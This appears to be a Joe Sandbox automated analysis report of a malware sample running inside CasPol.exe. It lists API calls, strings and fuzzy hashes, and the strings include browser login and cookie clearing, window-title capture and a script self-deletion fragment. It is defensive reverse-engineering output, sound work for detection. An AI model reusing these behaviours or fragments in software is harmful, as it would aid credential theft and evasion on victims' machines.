                                                                                                                  • GetModuleHandleA.KERNEL32(User32.dll,GetCursorInfo), ref: 0040143A
                                                                                                                  • GetProcAddress.KERNEL32(00000000), ref: 00401441
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000C.00000002.4130039364.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 0000000C.00000002.4130039364.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 0000000C.00000002.4130039364.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID: AddressHandleModuleProc
                                                                                                                  • String ID: GetCursorInfo$User32.dll
                                                                                                                  • API String ID: 1646373207-2714051624
                                                                                                                  • Opcode ID: dc8bea9838cb233a2310acf876650f342beeb4ce5054a53d2b393f5eabca9cdf
                                                                                                                  • Instruction ID: 8a619761425f66876362e8ef81435da0b65ff7d8438f08abde0d1abd95200d6c
                                                                                                                  • Opcode Fuzzy Hash: dc8bea9838cb233a2310acf876650f342beeb4ce5054a53d2b393f5eabca9cdf
                                                                                                                  • Instruction Fuzzy Hash: DAB092B458A3059BC7206BE0BD0EA083B64E644703B1000B2F087C1261EB788080DA6E
                                                                                                                  APIs
                                                                                                                  • LoadLibraryA.KERNEL32(User32.dll,GetLastInputInfo), ref: 004014DF
                                                                                                                  • GetProcAddress.KERNEL32(00000000), ref: 004014E6
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000C.00000002.4130039364.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 0000000C.00000002.4130039364.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 0000000C.00000002.4130039364.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID: AddressLibraryLoadProc
                                                                                                                  • String ID: GetLastInputInfo$User32.dll
                                                                                                                  • API String ID: 2574300362-1519888992
                                                                                                                  • Opcode ID: ef27dd233418dd298473fac05053b6d64ebabf300391abad082175f6434fde43
                                                                                                                  • Instruction ID: d4d82ae3f827bcfb7cdfeca7c6c066ea5703a418acbc3ecfb38afa42acb71bdc
                                                                                                                  • Opcode Fuzzy Hash: ef27dd233418dd298473fac05053b6d64ebabf300391abad082175f6434fde43
                                                                                                                  • Instruction Fuzzy Hash: 6CB092B85843449BC7212BF1BC0DA293AA8FA48B43720447AF406C21A1EB7881809F6F
                                                                                                                  APIs
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000C.00000002.4130039364.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 0000000C.00000002.4130039364.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 0000000C.00000002.4130039364.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID: __alldvrm$_strrchr
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 1036877536-0
                                                                                                                  • Opcode ID: 04a0325834f843994ade633b459a1d3cb356a39676a395bc181b674f0ba6452b
                                                                                                                  • Instruction ID: 44e25d054e292963cfc005d68317528f4d38ac36d82b99eb29904231438c363e
                                                                                                                  • Opcode Fuzzy Hash: 04a0325834f843994ade633b459a1d3cb356a39676a395bc181b674f0ba6452b
                                                                                                                  • Instruction Fuzzy Hash: C5A14671A042469FFB218F58C8817AFBBA1EF25354F28416FE5859B382CA3C8D45C759
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000C.00000002.4130039364.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 0000000C.00000002.4130039364.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 0000000C.00000002.4130039364.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: d8b583558f75d554b20f0fedcbaebc1f151a0833ef22d7844c2f17114d5a19f4
                                                                                                                  • Instruction ID: 06af4f468b8ce8c690b0d071e5f1d97fd8a921e774867ed9179d92c0916ed768
                                                                                                                  • Opcode Fuzzy Hash: d8b583558f75d554b20f0fedcbaebc1f151a0833ef22d7844c2f17114d5a19f4
                                                                                                                  • Instruction Fuzzy Hash: 3A412971A00744AFE724AF79CC41BAABBE8EB88714F10452FF511DB291E779A9818784
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  • Cleared browsers logins and cookies., xrefs: 0040B8EF
                                                                                                                  • [Cleared browsers logins and cookies.], xrefs: 0040B8DE
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000C.00000002.4130039364.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 0000000C.00000002.4130039364.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 0000000C.00000002.4130039364.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID: Sleep
                                                                                                                  • String ID: [Cleared browsers logins and cookies.]$Cleared browsers logins and cookies.
                                                                                                                  • API String ID: 3472027048-1236744412
                                                                                                                  • Opcode ID: c560560ec7d4d1dc68260b17dc6ebfb42e9a5e0b1871810b26060d25c010d2d5
                                                                                                                  • Instruction ID: 79c0b3a62e4074401f8092341c6d65849921352ddae30cadc40705057ad9e0e2
                                                                                                                  • Opcode Fuzzy Hash: c560560ec7d4d1dc68260b17dc6ebfb42e9a5e0b1871810b26060d25c010d2d5
                                                                                                                  • Instruction Fuzzy Hash: FC31891564C3816ACA11777514167EB6F958A93754F0884BFF8C42B3E3DB7A480893EF
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 0041265D: RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,00000000,004742F8), ref: 00412679
                                                                                                                    • Part of subcall function 0041265D: RegQueryValueExA.KERNEL32(00000000,00000000,00000000,00000000,00000208,?), ref: 00412692
                                                                                                                    • Part of subcall function 0041265D: RegCloseKey.KERNEL32(00000000), ref: 0041269D
                                                                                                                  • Sleep.KERNEL32(00000BB8), ref: 004115C3
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000C.00000002.4130039364.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 0000000C.00000002.4130039364.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 0000000C.00000002.4130039364.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID: CloseOpenQuerySleepValue
                                                                                                                  • String ID: @CG$exepath$BG
                                                                                                                  • API String ID: 4119054056-3221201242
                                                                                                                  • Opcode ID: da9c82b859fadff46026edc260230fa4890c9be1e72736e6911473bc79de2098
                                                                                                                  • Instruction ID: 3bb97b322c4281cea59bb4e220ac43bd532ded5f68553a77fc2ada00b9ce30da
                                                                                                                  • Opcode Fuzzy Hash: da9c82b859fadff46026edc260230fa4890c9be1e72736e6911473bc79de2098
                                                                                                                  • Instruction Fuzzy Hash: EC21F4A0B002042BD614B77A6C06ABF724E8BD1308F00457FBD4AA72D3DF7D9D4581AD
                                                                                                                  APIs
                                                                                                                  • EnumDisplayMonitors.USER32(00000000,00000000,0041870C,00000000), ref: 00418632
                                                                                                                  • EnumDisplayDevicesW.USER32(?), ref: 00418662
                                                                                                                  • EnumDisplayDevicesW.USER32(?,?,?,00000000), ref: 004186D7
                                                                                                                  • EnumDisplayDevicesW.USER32(00000000,00000000,?,00000000), ref: 004186F4
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000C.00000002.4130039364.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 0000000C.00000002.4130039364.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 0000000C.00000002.4130039364.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID: DisplayEnum$Devices$Monitors
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 1432082543-0
                                                                                                                  • Opcode ID: cb966e6306bdb11071c31b68200240cf75060c1ea1cbf38c1b590a92a7f3e121
                                                                                                                  • Instruction ID: 3487619ef7b62fdcdebcbe554659b8730097b511a659717e719cc71a18cb279a
                                                                                                                  • Opcode Fuzzy Hash: cb966e6306bdb11071c31b68200240cf75060c1ea1cbf38c1b590a92a7f3e121
                                                                                                                  • Instruction Fuzzy Hash: 2F2150722043046BD220EF16DC45EABBBECEFD1754F10052FB549D2191EA78AA45C6AA
                                                                                                                  APIs
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000C.00000002.4130039364.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 0000000C.00000002.4130039364.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 0000000C.00000002.4130039364.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID: SystemTimes$Sleep__aulldiv
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 188215759-0
                                                                                                                  • Opcode ID: a7aecd4cc0fde8f7b051f4ea324c4733a42c71902c3a125d4e8e0ff6e46eea08
                                                                                                                  • Instruction ID: a679ad691b1e431344cd65e278b90b5c6278f623fb05ceb41248f345421e7781
                                                                                                                  • Opcode Fuzzy Hash: a7aecd4cc0fde8f7b051f4ea324c4733a42c71902c3a125d4e8e0ff6e46eea08
                                                                                                                  • Instruction Fuzzy Hash: 30215E725093009BC304DFA5D98589FB7E8EFC8754F044A2EF585D3251EA35EA49CBA3
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 0041B6F6: GetForegroundWindow.USER32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0041B706
                                                                                                                    • Part of subcall function 0041B6F6: GetWindowTextLengthW.USER32(00000000), ref: 0041B70F
                                                                                                                    • Part of subcall function 0041B6F6: GetWindowTextW.USER32(00000000,00000000,00000001), ref: 0041B739
                                                                                                                  • Sleep.KERNEL32(000001F4), ref: 00409C95
                                                                                                                  • Sleep.KERNEL32(00000064), ref: 00409D1F
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000C.00000002.4130039364.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 0000000C.00000002.4130039364.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 0000000C.00000002.4130039364.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID: Window$SleepText$ForegroundLength
                                                                                                                  • String ID: [ $ ]
                                                                                                                  • API String ID: 3309952895-93608704
                                                                                                                  • Opcode ID: 94898d049807b5b7b9a9a00ee9d94e571809afb3060b307ff591eca3c25171bd
                                                                                                                  • Instruction ID: 884b77faaa60fb736012887943be30d2742787962025037229812ea18f618e82
                                                                                                                  • Opcode Fuzzy Hash: 94898d049807b5b7b9a9a00ee9d94e571809afb3060b307ff591eca3c25171bd
                                                                                                                  • Instruction Fuzzy Hash: 2E119F325042005BD218BB26DD17AAEB7A8AF50708F40047FF542221D3EF39AE1986DF
                                                                                                                  APIs
                                                                                                                  • CreateFileW.KERNEL32(00000000,40000000,00000000,00000000,00000002,00000080,00000000,00000000,00000000,00465900,00000000,00000000,0040C267,00000000,00000000,fso.DeleteFile(Wscript.ScriptFullName)), ref: 0041B5DE
                                                                                                                  • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 0041B5FB
                                                                                                                  • WriteFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 0041B60F
                                                                                                                  • CloseHandle.KERNEL32(00000000), ref: 0041B61C
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000C.00000002.4130039364.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 0000000C.00000002.4130039364.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 0000000C.00000002.4130039364.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID: File$CloseCreateHandlePointerWrite
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3604237281-0
                                                                                                                  • Opcode ID: cba3a97e1e2bda49592f8a8e1d6d35a5d6160c6c563f13c2ae5fe5c742252b28
                                                                                                                  • Instruction ID: 3b94612a358327762e597db0d4245ee78264fa841ead315e3e24d1cb8b3ec7b7
                                                                                                                  • Opcode Fuzzy Hash: cba3a97e1e2bda49592f8a8e1d6d35a5d6160c6c563f13c2ae5fe5c742252b28
                                                                                                                  • Instruction Fuzzy Hash: 3F01F5712082147FE6104F28AC89EBB739DEB96379F14063AF952C22C0D765CC8596BE
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000C.00000002.4130039364.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 0000000C.00000002.4130039364.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 0000000C.00000002.4130039364.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 18f7b12d8fbd203e6fe2bd4c4423912ade4cd6e2ab417617722edd39325a2eb9
                                                                                                                  • Instruction ID: dab0b0a7df633c5b48e856b81aae527c8b914588f9bdc990e5f583acd93a84b2
                                                                                                                  • Opcode Fuzzy Hash: 18f7b12d8fbd203e6fe2bd4c4423912ade4cd6e2ab417617722edd39325a2eb9
                                                                                                                  • Instruction Fuzzy Hash: 5701F2F2A097163EF62116792CC0F6B670DDF413B9B31073BB921622E1EAE8CC42506C
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000C.00000002.4130039364.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 0000000C.00000002.4130039364.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 0000000C.00000002.4130039364.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 8aedf970bdaeb9d9c72bc659829c2e19759f544123fe9e87a80c2ba2346fca48
                                                                                                                  • Instruction ID: 297bbf4b6e7cb62aad9c1df2c980cfc74e2a715ef03096c7e716b38b90e38ed5
                                                                                                                  • Opcode Fuzzy Hash: 8aedf970bdaeb9d9c72bc659829c2e19759f544123fe9e87a80c2ba2346fca48
                                                                                                                  • Instruction Fuzzy Hash: 5401D1F2A096167EB7201A7A7DC0D67624EDF823B9371033BF421612D5EAA88C408179
                                                                                                                  APIs
                                                                                                                  • ___BuildCatchObject.LIBVCRUNTIME ref: 0043811F
                                                                                                                    • Part of subcall function 0043806C: BuildCatchObjectHelperInternal.LIBVCRUNTIME ref: 0043809B
                                                                                                                    • Part of subcall function 0043806C: ___AdjustPointer.LIBCMT ref: 004380B6
                                                                                                                  • _UnwindNestedFrames.LIBCMT ref: 00438134
                                                                                                                  • __FrameHandler3::FrameUnwindToState.LIBVCRUNTIME ref: 00438145
                                                                                                                  • CallCatchBlock.LIBVCRUNTIME ref: 0043816D
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000C.00000002.4130039364.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 0000000C.00000002.4130039364.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 0000000C.00000002.4130039364.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID: Catch$BuildFrameObjectUnwind$AdjustBlockCallFramesHandler3::HelperInternalNestedPointerState
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 737400349-0
                                                                                                                  • Opcode ID: c8370f5f766c88f9b882548d03e746073a9763e8d7037f7b78bb80a5d64990c6
                                                                                                                  • Instruction ID: b756294ed3ea81ca49fa364012696409ae819ba0eb544c37e892c8a1feda9a6f
                                                                                                                  • Opcode Fuzzy Hash: c8370f5f766c88f9b882548d03e746073a9763e8d7037f7b78bb80a5d64990c6
                                                                                                                  • Instruction Fuzzy Hash: D7012D72100208BBDF126E96CC45DEB7B69EF4C758F04501DFE4866121C73AE862DBA4
                                                                                                                  APIs
                                                                                                                  • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,00414BBD,00000000,00000000,?,004471C7,00414BBD,00000000,00000000,00000000,?,004474F3,00000006,FlsSetValue), ref: 00447252
                                                                                                                  • GetLastError.KERNEL32(?,004471C7,00414BBD,00000000,00000000,00000000,?,004474F3,00000006,FlsSetValue,0045D328,FlsSetValue,00000000,00000364,?,00446FA1), ref: 0044725E
                                                                                                                  • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,004471C7,00414BBD,00000000,00000000,00000000,?,004474F3,00000006,FlsSetValue,0045D328,FlsSetValue,00000000), ref: 0044726C
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000C.00000002.4130039364.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 0000000C.00000002.4130039364.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 0000000C.00000002.4130039364.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID: LibraryLoad$ErrorLast
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3177248105-0
                                                                                                                  • Opcode ID: ae052748fea16bfd64aed14cfe47709c8c773e0353203442da9e9610ebb1fa47
                                                                                                                  • Instruction ID: b3fe555fe56df17639c4036f58dc3a809bdc468a9df6621700516029eed46faf
                                                                                                                  • Opcode Fuzzy Hash: ae052748fea16bfd64aed14cfe47709c8c773e0353203442da9e9610ebb1fa47
                                                                                                                  • Instruction Fuzzy Hash: 0D01D432649323ABD7214B79BC44A5737D8BB05BA2B2506B1F906E3241D768D802CAE8
                                                                                                                  APIs
                                                                                                                  • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,10001D66,00000000,00000000,?,10005C88,10001D66,00000000,00000000,00000000,?,10005E85,00000006,FlsSetValue), ref: 10005D13
                                                                                                                  • GetLastError.KERNEL32(?,10005C88,10001D66,00000000,00000000,00000000,?,10005E85,00000006,FlsSetValue,1000E190,FlsSetValue,00000000,00000364,?,10005BC8), ref: 10005D1F
                                                                                                                  • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,10005C88,10001D66,00000000,00000000,00000000,?,10005E85,00000006,FlsSetValue,1000E190,FlsSetValue,00000000), ref: 10005D2D
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000C.00000002.4137058188.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                  • Associated: 0000000C.00000002.4136980742.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 0000000C.00000002.4137058188.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_12_2_10000000_CasPol.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: LibraryLoad$ErrorLast
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3177248105-0
                                                                                                                  • Opcode ID: 803c5c09655bb12e7a00387565e20d3af286ada8f732c439529cecb726329beb
                                                                                                                  • Instruction ID: ab8c2af688280ff547417c348c7c3430721907d0b6a0cc88e9d35c15e8af339b
                                                                                                                  • Opcode Fuzzy Hash: 803c5c09655bb12e7a00387565e20d3af286ada8f732c439529cecb726329beb
                                                                                                                  • Instruction Fuzzy Hash: 59018436615732ABE7319B689C8CB4B7798EF056E2B214623F909D7158D731D801CAE0
                                                                                                                  APIs
                                                                                                                  • GetSystemMetrics.USER32(0000004C), ref: 00418529
                                                                                                                  • GetSystemMetrics.USER32(0000004D), ref: 0041852F
                                                                                                                  • GetSystemMetrics.USER32(0000004E), ref: 00418535
                                                                                                                  • GetSystemMetrics.USER32(0000004F), ref: 0041853B
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000C.00000002.4130039364.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 0000000C.00000002.4130039364.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 0000000C.00000002.4130039364.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID: MetricsSystem
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 4116985748-0
                                                                                                                  • Opcode ID: a3bedc3d93ee6e0b45313aeec5082688588fe46082e633aeec829f05b9632c7f
                                                                                                                  • Instruction ID: f480d68fafb364c29fc67a5f666d93eee18e0abee54110dfc95006384cbaadd6
                                                                                                                  • Opcode Fuzzy Hash: a3bedc3d93ee6e0b45313aeec5082688588fe46082e633aeec829f05b9632c7f
                                                                                                                  • Instruction Fuzzy Hash: 72F0D672B043256BCA00EA7A4C4156FAB97DFC46A4F25083FE6059B341DE78EC4647D9
                                                                                                                  APIs
                                                                                                                  • __startOneArgErrorHandling.LIBCMT ref: 00441F7D
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000C.00000002.4130039364.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 0000000C.00000002.4130039364.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 0000000C.00000002.4130039364.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID: ErrorHandling__start
                                                                                                                  • String ID: pow
                                                                                                                  • API String ID: 3213639722-2276729525
                                                                                                                  • Opcode ID: c11d7b0c0eb8e10153fe90c38a808d625a788e1790705f3c08302100bb714254
                                                                                                                  • Instruction ID: b0758be5652a64c1ac5d647a76b92dde9bac1040a8da8be5e5c84d6172790ea5
                                                                                                                  • Opcode Fuzzy Hash: c11d7b0c0eb8e10153fe90c38a808d625a788e1790705f3c08302100bb714254
                                                                                                                  • Instruction Fuzzy Hash: E6515A61A0A20296F7117B14C98136F6B949B50741F288D6BF085823F9EF3DCCDB9A4E
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000C.00000002.4130039364.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 0000000C.00000002.4130039364.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 0000000C.00000002.4130039364.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID: _memcmp
                                                                                                                  • String ID: 4[G$4[G
                                                                                                                  • API String ID: 2931989736-4028565467
                                                                                                                  • Opcode ID: 499d9a999da2a443c979618ec85ef4d06b5b2aab7498d5870cc08a11d2f7c627
                                                                                                                  • Instruction ID: 33b36a833443cc607bae0a2c4f054eab59dd7b99d1d8389eb50a0704093c1055
                                                                                                                  • Opcode Fuzzy Hash: 499d9a999da2a443c979618ec85ef4d06b5b2aab7498d5870cc08a11d2f7c627
                                                                                                                  • Instruction Fuzzy Hash: E56110716047069AC714DF28D8406B3B7A8FF98304F44063EEC5D8F656E778AA25CBAD
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 100069F3: GetOEMCP.KERNEL32(00000000,?,?,10006C7C,?), ref: 10006A1E
                                                                                                                  • IsValidCodePage.KERNEL32(-00000030,00000000,?,?,?,?,10006CC1,?,00000000), ref: 10006E94
                                                                                                                  • GetCPInfo.KERNEL32(00000000,10006CC1,?,?,?,10006CC1,?,00000000), ref: 10006EA7
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000C.00000002.4137058188.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                  • Associated: 0000000C.00000002.4136980742.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 0000000C.00000002.4137058188.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_12_2_10000000_CasPol.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: CodeInfoPageValid
                                                                                                                  • String ID: h(RA/
                                                                                                                  • API String ID: 546120528-661517699
                                                                                                                  • Opcode ID: 4adf61bb8ef5ba689b58ef35b1aaecca0a92cbb4d0ae1edbfb61d6a665a170f3
                                                                                                                  • Instruction ID: 1dd91d3823b6bb4934ca9945ee4913e93bf289da146d72ec34fd0236562290e4
                                                                                                                  • Opcode Fuzzy Hash: 4adf61bb8ef5ba689b58ef35b1aaecca0a92cbb4d0ae1edbfb61d6a665a170f3
                                                                                                                  • Instruction Fuzzy Hash: 91513474E043469EFB21CF71DC916BBBBE6EF49280F20807EE48687156D735DA458B90
                                                                                                                  APIs
                                                                                                                  • GetCPInfo.KERNEL32(?,?,00000005,?,00000000), ref: 0044DB69
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000C.00000002.4130039364.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 0000000C.00000002.4130039364.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 0000000C.00000002.4130039364.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID: Info
                                                                                                                  • String ID: $vD
                                                                                                                  • API String ID: 1807457897-3636070802
                                                                                                                  • Opcode ID: 5a1be195421d57dadb90a7404d285975d7b8ac1b4122976fa75ce4288470c48d
                                                                                                                  • Instruction ID: 639e137743dbd1cdb094e6b6e994140176401b7572b89e22c1ac552797110b95
